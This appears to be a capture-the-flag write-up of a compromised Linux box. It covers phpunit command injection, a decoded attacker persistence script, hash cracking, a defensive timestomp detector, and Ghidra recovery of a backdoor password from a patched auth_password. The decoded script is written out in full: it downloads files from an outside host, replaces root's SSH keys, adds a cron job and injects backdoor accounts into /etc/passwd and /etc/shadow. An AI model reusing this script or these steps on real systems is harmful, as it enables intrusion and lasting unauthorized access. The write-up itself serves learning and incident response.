Searching for a phpunit exploit, I got results.
Making a command request to this URL gives us command injection and a shell.
Attackers have already compromised this system and placed a backdoor in it.
find / -user www-data 2>/dev/null | grep -v proc | grep -v /var/www/
Got this file: /var/backups/info
Copied it to my machine and ran strings on it.
Got this hex; decoded it with CyberChef:
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
Removed the extra backslashes and gave the hash to hashcat:
ihatehackers
There is another user named steven1 (the script above appends a "1" to every login with UID >= 1000 and a /bin/bash shell).
Using ssh to log in. Even though there are two users, they are linked: the script creates steven1 with the same UID and GID as steven.
steven1 : ihatehackers
A mail for the steven user, something to do with apache.
Doing incident response on the box.
for i in /etc/ ; do ls -la --time-style=full $i | grep -v '00000\|->';done
Nothing.
find / -type f -printf "%T+ %p\n" 2>/dev/null | grep -v '0000\| /proc\| /run\| /sys\| pyc\| /etc\| /boot\|python\| /var/log\| /var/lib'
Nothing.
Maybe the attacker edited the timestamp but only set it to the day, not down to the hours, minutes and seconds.
find / -type f -printf "%T+ %p\n" 2>/dev/null | grep 00:00:00 | grep -v sys | grep -v proc | grep -v run
Got a result.
attacker machine ->
My machine
On my machine it's just 1.3 MB, but on the victim it's 3.5 MB, so the attacker replaced the binary with their own, probably a backdoor, and afterwards edited the timestamp but forgot to set the hours, minutes and seconds.
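The timestomp hunt above (a date set with no time of day) as a reusable check, written as an added example rather than the writeup's own commands; it walks a tree and flags regular files whose mtime is exactly midnight with a zero nanosecond part, which a real write almost never produces.

```python
"""Flag files whose mtime looks timestomped to a bare date (added example).

Heuristic from the writeup: an attacker who sets only a date leaves hour,
minute, second and nanoseconds all at zero.  Paths and skip list are my own
assumptions, mirroring the grep -v filters used in the find command.
"""
import os
import stat
import sys
import time


def is_midnight_mtime(st):
    """True if mtime is exactly 00:00:00.000000000 in local time."""
    if st.st_mtime_ns % 1_000_000_000:
        return False  # genuine writes carry a sub-second part
    tm = time.localtime(st.st_mtime)
    return (tm.tm_hour, tm.tm_min, tm.tm_sec) == (0, 0, 0)


def find_timestomped(root, skip=("/proc", "/sys", "/run", "/dev")):
    """Return regular files under `root` with a suspiciously round mtime."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(skip):
            dirnames[:] = []  # do not descend into pseudo-filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and is_midnight_mtime(st):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for p in find_timestomped(sys.argv[1] if len(sys.argv) > 1 else "/"):
        mtime = time.localtime(os.lstat(p).st_mtime)
        print(time.strftime("%Y-%m-%d %H:%M:%S", mtime), p)
```

Compare each hit against the package manager's copy or a known-good host, as the size comparison above did for the 3.5 MB binary.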
Running Ghidra on it.
In the Symbol Tree -> Exports, the function auth_password has variables named backdoor.
There is an array of characters that are joined together and then XORed with 0x96; I asked ChatGPT to do it.
# Recover the hard-coded password from auth_password().
# Ghidra shows the bytes as signed chars (bVar7 = 0xd6 is backdoor[0] as unsigned);
# each byte is XORed with 0x96 before being compared to the supplied password.
backdoor = [0] * 31
backdoor[0] = -0x2a
backdoor[1] = -0x55
backdoor[2] = -0x19
backdoor[3] = -0x10
backdoor[4] = -0xd
backdoor[5] = -0x5d
backdoor[6] = -0x4d
backdoor[7] = -0x5c
backdoor[8] = -0x38
backdoor[9] = -3
backdoor[10] = -0x45
backdoor[11] = -9
backdoor[12] = -0x19
backdoor[13] = -0x2a
backdoor[14] = -0x4d
backdoor[15] = -3
backdoor[16] = -0x2a
backdoor[17] = -0x4d
backdoor[18] = -0x60
backdoor[19] = -3
backdoor[20] = -0x60
backdoor[21] = -0xc
backdoor[22] = -0x2a
backdoor[23] = -0x4e
backdoor[24] = -0x1d
backdoor[25] = -0x4b
backdoor[26] = -0x10
backdoor[27] = -0x44
backdoor[28] = -0xc
backdoor[29] = -0x57
backdoor[30] = -0x5b

# Convert the signed values to unsigned bytes, then undo the XOR with 0x96
backdoor_bytes = bytes(b & 0xFF for b in backdoor)
result = bytes(b ^ 0x96 for b in backdoor_bytes)
print(result.decode("ascii"))
Output -> @=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
root : @=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
root